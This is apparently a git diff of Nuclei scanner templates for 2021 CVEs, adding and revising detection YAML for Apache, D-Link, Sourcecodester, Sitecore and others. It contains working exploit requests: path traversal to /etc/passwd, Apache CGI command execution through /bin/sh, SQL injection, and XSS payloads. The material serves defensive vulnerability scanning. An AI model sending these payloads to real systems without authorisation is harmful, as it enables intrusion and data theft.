+      - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2021/CVE-2021-41653.yaml b/cves/2021/CVE-2021-41653.yaml
index 7a97987a94..bbc4fdbe67 100644
--- a/cves/2021/CVE-2021-41653.yaml
+++ b/cves/2021/CVE-2021-41653.yaml
@@ -9,12 +9,12 @@ info:
     - https://k4m1ll0.com/cve-2021-41653.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41653
     - https://www.tp-link.com/us/press/security-advisory/
+  remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-41653
     cwe-id: CWE-94
-  remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
   tags: cve,cve2021,tplink,rce,router
 
 requests:
diff --git a/cves/2021/CVE-2021-41691.yaml b/cves/2021/CVE-2021-41691.yaml
index e4c0c19078..3270969826 100644
--- a/cves/2021/CVE-2021-41691.yaml
+++ b/cves/2021/CVE-2021-41691.yaml
@@ -11,7 +11,10 @@ info:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
   classification:
     cve-id: CVE-2021-41691
-  tags: cve,cve2021,opensis,sqli,auth
+  tags: sqli,auth,edb,cve,cve2021,opensis
+
+variables:
+  num: "999999999"
 
 requests:
   - raw:
@@ -29,7 +32,7 @@ requests:
         Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
 
-        student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
+        student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
 
     attack: pitchfork
     payloads:
diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml
index 411dfe162a..2786956c21 100644
--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@@ -2,11 +2,9 @@ id: CVE-2021-41773
 
 info:
   name: Apache 2.4.49 - Path Traversal and Remote Code Execution
-  author: daffainfo
+  author: daffainfo,666asd
   severity: high
-  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files
-    outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be
-    exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
+  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
   reference:
     - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
@@ -14,29 +12,34 @@ info:
     - https://twitter.com/ptswarm/status/1445376079548624899
     - https://twitter.com/h4x0r_dz/status/1445401960371429381
     - https://github.com/blasty/CVE-2021-41773
+  remediation: Update to Apache HTTP Server 2.4.50 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-41773
     cwe-id: CWE-22
-  remediation: Update to Apache HTTP Server 2.4.50 or later.
   metadata:
-    shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
-  tags: cve,cve2021,lfi,rce,apache,misconfig,traversal
+    shodan-query: apache version:2.4.49
+    verified: "true"
+  tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
+
+variables:
+  cmd: "echo COP-37714-1202-EVC | rev"
 
 requests:
   - raw:
       - |
-        GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
+        GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
         Host: {{Hostname}}
 
       - |
-        POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
+        POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
+        echo Content-Type: text/plain; echo; {{cmd}}
 
+    stop-at-first-match: true
     matchers-condition: or
     matchers:
 
diff --git a/cves/2021/CVE-2021-41826.yaml b/cves/2021/CVE-2021-41826.yaml
index 4e82f41a4d..8003b0a16e 100644
--- a/cves/2021/CVE-2021-41826.yaml
+++ b/cves/2021/CVE-2021-41826.yaml
@@ -14,12 +14,12 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-41826
     cwe-id: CWE-601
-  tags: cve,cve2021,placeos,redirect
+  tags: cve2021,placeos,redirect,edb,cve
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/auth/logout?continue=//example.com"
+      - "{{BaseURL}}/auth/logout?continue=//interact.sh"
 
     matchers-condition: and
     matchers:
@@ -33,6 +33,6 @@ requests:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
 
 # Enhanced by mp on 2022/02/27
diff --git a/cves/2021/CVE-2021-41878.yaml b/cves/2021/CVE-2021-41878.yaml
index 5c1412624c..2dee76be4a 100644
--- a/cves/2021/CVE-2021-41878.yaml
+++ b/cves/2021/CVE-2021-41878.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-41878
 
 info:
-  name: i-Panel Administration System - Reflected Cross-Site Scripting
+  name: i-Panel Administration System - Cross-Site Scripting
   author: madrobot
   severity: medium
   description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
diff --git a/cves/2021/CVE-2021-4191.yaml b/cves/2021/CVE-2021-4191.yaml
index bccbb6ac4d..de5a09ee90 100644
--- a/cves/2021/CVE-2021-4191.yaml
+++ b/cves/2021/CVE-2021-4191.yaml
@@ -9,11 +9,12 @@ info:
     - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
     - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/343898
   classification:
-    cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2021-4191
-    cwe-id: CWE-359
+    cwe-id: CWE-287
   tags: cve,cve2021,gitlab,api,graphql,enum,unauth
 
 requests:
diff --git a/cves/2021/CVE-2021-41951.yaml b/cves/2021/CVE-2021-41951.yaml
index 276e63651a..2e88f62361 100644
--- a/cves/2021/CVE-2021-41951.yaml
+++ b/cves/2021/CVE-2021-41951.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-41951
 
 info:
-  name: Resourcespace - Reflected Cross-Site Scripting
+  name: Resourcespace - Cross-Site Scripting
   author: coldfish
   severity: medium
   description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml
index 923a8bce3e..d91a1e2561 100644
--- a/cves/2021/CVE-2021-42013.yaml
+++ b/cves/2021/CVE-2021-42013.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-42013
 
 info:
   name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
-  author: nvn1729,0xd0ff9
+  author: nvn1729,0xd0ff9,666asd
   severity: critical
   description: |
     A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
@@ -11,18 +11,28 @@ info:
     - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
     - https://nvd.nist.gov/vuln/detail/CVE-2021-42013
     - https://twitter.com/itsecurityco/status/1446136957117943815
+  remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-42013
     cwe-id: CWE-22
-  remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
-  tags: cve,cve2021,lfi,apache,rce,misconfig,traversal
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev
+
+variables:
+  cmd: "echo COP-37714-1202-EVC | rev"
 
 requests:
   - raw:
       - |+
-        GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
+        GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+
+      - |+
+        GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
 
@@ -32,8 +42,9 @@ requests:
         Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
 
-        echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev
+        echo Echo: CVE-2021-42013; echo; {{cmd}};
 
+    stop-at-first-match: true
     unsafe: true
     matchers-condition: or
     matchers:
diff --git a/cves/2021/CVE-2021-42063.yaml b/cves/2021/CVE-2021-42063.yaml
index b297c14399..be4cdc8a05 100644
--- a/cves/2021/CVE-2021-42063.yaml
+++ b/cves/2021/CVE-2021-42063.yaml
@@ -1,11 +1,11 @@
 id: CVE-2021-42063
 
 info:
-  name: SAP Knowledge Warehouse (KW) - Reflected XSS
+  name: SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting
   author: pdteam
   severity: medium
   description: |
-    A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data.
+    SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser.
   reference:
     - https://seclists.org/fulldisclosure/2022/Mar/32
     - https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
@@ -17,10 +17,9 @@ info:
     cve-id: CVE-2021-42063
     cwe-id: CWE-79
   metadata:
-    shodan-query:
-      - SAP NetWeaver Application Server
-      - http.component:"SAP"
-  tags: cve,cve2021,sap,xss
+    shodan-query: http.favicon.hash:-266008933
+    zoomeye-query: +app:"SAP NetWeaver Application Server httpd
+  tags: cve2021,sap,xss,seclists,packetstorm,cve
 
 requests:
   - method: GET
@@ -43,4 +42,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-42071.yaml b/cves/2021/CVE-2021-42071.yaml
index d3255e598c..1aa5e47885 100644
--- a/cves/2021/CVE-2021-42071.yaml
+++ b/cves/2021/CVE-2021-42071.yaml
@@ -8,9 +8,13 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/50098
     - https://nvd.nist.gov/vuln/detail/CVE-2021-42071
+    - https://visual-tools.com/
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2021-42071
-  tags: visualtools,rce,oast,injection
+    cwe-id: CWE-78
+  tags: edb,cve,cve2021,visualtools,rce,oast,injection
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-44103.yaml b/cves/2021/CVE-2021-42192.yaml
similarity index 71%
rename from cves/2021/CVE-2021-44103.yaml
rename to cves/2021/CVE-2021-42192.yaml
index 3d0aca8576..486db32a13 100644
--- a/cves/2021/CVE-2021-44103.yaml
+++ b/cves/2021/CVE-2021-42192.yaml
@@ -1,20 +1,21 @@
-id: CVE-2021-44103
+id: CVE-2021-42192
 
 info:
-  name: KOGA 0.14.9 - Privilege Escalation
+  name: KONGA 0.14.9 - Privilege Escalation
   author: rschio
   severity: high
-  description: Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID}
-    at ADMIN parameter.
+  description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
   reference:
     - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
     - https://www.exploit-db.com/exploits/50521
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103
+    - hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192
+    - https://docs.google.com/document/d/1-YU9zWiDVUps3Mb6zos3996yvZ48vW_vfOvaJLLHc4I/edit?usp=sharing
   classification:
-    cvss-score: 8.7
-    cve-id: CVE-2021-44103
-    cwe-id: CWE-264
-  tags: cve,cve2021,konga,authenticated
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2021-42192
+    cwe-id: CWE-269
+  tags: authenticated,edb,cve,cve2021,konga
 
 requests:
   - raw:
@@ -77,3 +78,5 @@ requests:
         group: 1
         regex:
           - '"token":"(.*)"'
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-42237.yaml b/cves/2021/CVE-2021-42237.yaml
index d04970437f..817cce7501 100644
--- a/cves/2021/CVE-2021-42237.yaml
+++ b/cves/2021/CVE-2021-42237.yaml
@@ -4,24 +4,21 @@ info:
   name: Sitecore Experience Platform Pre-Auth RCE
   author: pdteam
   severity: critical
-  description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration
-    required.
+  description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required.
   reference:
     - https://blog.assetnote.io/2021/11/02/sitecore-rce/
     - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
     - https://nvd.nist.gov/vuln/detail/CVE-2021-42237
+    - http://sitecore.com
+  remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-42237
     cwe-id: CWE-502
-  remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight
-    Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version
-    and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0
-    - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
   metadata:
     shodan-query: http.title:"SiteCore"
-  tags: cve,cve2021,rce,sitecore,deserialization,oast
+  tags: cve,cve2021,rce,sitecore,deserialization,oast,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml
index 4d92c46df7..2816a1013b 100644
--- a/cves/2021/CVE-2021-42258.yaml
+++ b/cves/2021/CVE-2021-42258.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-42258
     cwe-id: CWE-89
-  tags: cve,cve2021,sqli,billquick
+  tags: cve,cve2021,sqli,billquick,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-42551.yaml b/cves/2021/CVE-2021-42551.yaml
index 020ace78d8..b3d372976f 100644
--- a/cves/2021/CVE-2021-42551.yaml
+++ b/cves/2021/CVE-2021-42551.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-42551
 
 info:
-  name: NetBiblio WebOPAC - Reflected Cross-Site Scripting
+  name: NetBiblio WebOPAC - Cross-Site Scripting
   author: compr00t
   severity: medium
   description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
diff --git a/cves/2021/CVE-2021-42565.yaml b/cves/2021/CVE-2021-42565.yaml
index 5bdc0dd5b2..e2eb25ff0b 100644
--- a/cves/2021/CVE-2021-42565.yaml
+++ b/cves/2021/CVE-2021-42565.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-42565
 
 info:
-  name: myfactory FMS  -  Reflected Cross-Site Scripting
+  name: myfactory FMS  -  Cross-Site Scripting
   author: madrobot
   severity: medium
   description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-42565
     - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
+    - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml
index 5a4e4bb12c..cff2373649 100644
--- a/cves/2021/CVE-2021-42566.yaml
+++ b/cves/2021/CVE-2021-42566.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-42566
 
 info:
-  name: myfactory FMS  -  Reflected Cross-Site Scripting
+  name: myfactory FMS  -  Cross-Site Scripting
   author: madrobot
   severity: medium
   description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
@@ -9,6 +9,7 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-42566
     - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
+    - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2021/CVE-2021-42567.yaml b/cves/2021/CVE-2021-42567.yaml
index 3b77599b4c..2e849316d8 100644
--- a/cves/2021/CVE-2021-42567.yaml
+++ b/cves/2021/CVE-2021-42567.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-42567
 
 info:
-  name: Apereo CAS Reflected Cross-Site Scripting
+  name: Apereo CAS Cross-Site Scripting
   author: pdteam
   severity: medium
   description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
diff --git a/cves/2021/CVE-2021-42627.yaml b/cves/2021/CVE-2021-42627.yaml
new file mode 100644
index 0000000000..624c342ff8
--- /dev/null
+++ b/cves/2021/CVE-2021-42627.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-42627
+
+info:
+  name: D-Link DIR-615 - Unauthorized Access
+  author: For3stCo1d
+  severity: critical
+  description: |
+    The WAN configuration page "wan.htm" on D-Link DIR-615 devices with firmware 20.06 can be accessed directly without authentication which can lead to disclose the information about WAN settings and also leverage attacker to modify the data fields of page.
+  reference:
+    - https://github.com/sanjokkarki/D-Link-DIR-615/blob/main/CVE-2021-42627
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42627
+    - https://www.dlink.com/en/security-bulletin/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-42627
+  metadata:
+    shodan-query: http.title:"Roteador Wireless"
+    verified: "true"
+  tags: cve,cve2021,d-link,router,unauth,dir-615,roteador
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wan.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");"
+          - "var ipv6conntype"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - Virtual Web
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2021/CVE-2021-42663.yaml b/cves/2021/CVE-2021-42663.yaml
new file mode 100644
index 0000000000..fdbe90da38
--- /dev/null
+++ b/cves/2021/CVE-2021-42663.yaml
@@ -0,0 +1,55 @@
+id: CVE-2021-42663
+
+info:
+  name: Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting
+  author: fxploit
+  severity: medium
+  description: |
+    Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker's choice displays.
+  reference:
+    - https://github.com/0xDeku/CVE-2021-42663
+    - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
+    - https://github.com/TheHackingRabbi/CVE-2021-42663
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42663
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2021-42663
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss
+
+requests:
+  - raw:
+      - |
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        name={{username}}&pwd={{password}}
+
+      - |
+        GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</i><script>alert(document.domain)</script></div>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-42667.yaml b/cves/2021/CVE-2021-42667.yaml
new file mode 100644
index 0000000000..3a8a8cf24e
--- /dev/null
+++ b/cves/2021/CVE-2021-42667.yaml
@@ -0,0 +1,51 @@
+id: CVE-2021-42667
+
+info:
+  name: Online Event Booking and Reservation System version 2.3.0 - SQL injection
+  author: fxploit
+  severity: critical
+  description: |
+    A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
+  reference:
+    - https://github.com/0xDeku/CVE-2021-42667
+    - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42667
+    - https://github.com/TheHackingRabbi/CVE-2021-42667
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-42667
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,sqli,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        name={{username}}&pwd={{password}}
+
+      - |
+        GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2021/CVE-2021-43062.yaml b/cves/2021/CVE-2021-43062.yaml
index 3432b2ec22..e610c2d95c 100644
--- a/cves/2021/CVE-2021-43062.yaml
+++ b/cves/2021/CVE-2021-43062.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-43062
 
 info:
-  name: Fortinet FortiMail 7.0.1 - Reflected Cross-Site Scripting
+  name: Fortinet FortiMail 7.0.1 - Cross-Site Scripting
   author: ajaysenr
   severity: medium
   description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.
@@ -9,12 +9,13 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-43062
     - https://www.fortiguard.com/psirt/FG-IR-21-185
     - https://www.exploit-db.com/exploits/50759
+    - https://fortiguard.com/advisory/FG-IR-21-185
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-43062
     cwe-id: CWE-79
-  tags: cve,cve2021,fortimail,xss,fortinet
+  tags: cve,cve2021,fortimail,xss,fortinet,edb
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-43287.yaml b/cves/2021/CVE-2021-43287.yaml
index fb0ab221c2..967d3f299d 100644
--- a/cves/2021/CVE-2021-43287.yaml
+++ b/cves/2021/CVE-2021-43287.yaml
@@ -3,15 +3,19 @@ id: CVE-2021-43287
 info:
   name: Pre-Auth Takeover of Build Pipelines in GoCD
   author: dhiyaneshDk
-  severity: critical
+  severity: high
   description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
   reference:
     - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
     - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
     - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
-  classification:
-    cve-id: CVE-2021-43287
+    - https://www.gocd.org/releases/#21-3-0
   remediation: Upgrade to version v21.3.0. or later.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-43287
+    cwe-id: CWE-200
   metadata:
     shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
   tags: cve,cve2021,go,lfi,gocd,takeover
diff --git a/cves/2021/CVE-2021-43496.yaml b/cves/2021/CVE-2021-43496.yaml
index 12379a7025..4b96e8518c 100644
--- a/cves/2021/CVE-2021-43496.yaml
+++ b/cves/2021/CVE-2021-43496.yaml
@@ -4,13 +4,12 @@ info:
   name: Clustering Local File Inclusion
   author: Evan Rubinstein
   severity: high
-  description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere
-    on the system and can significantly aid in getting remote code access.
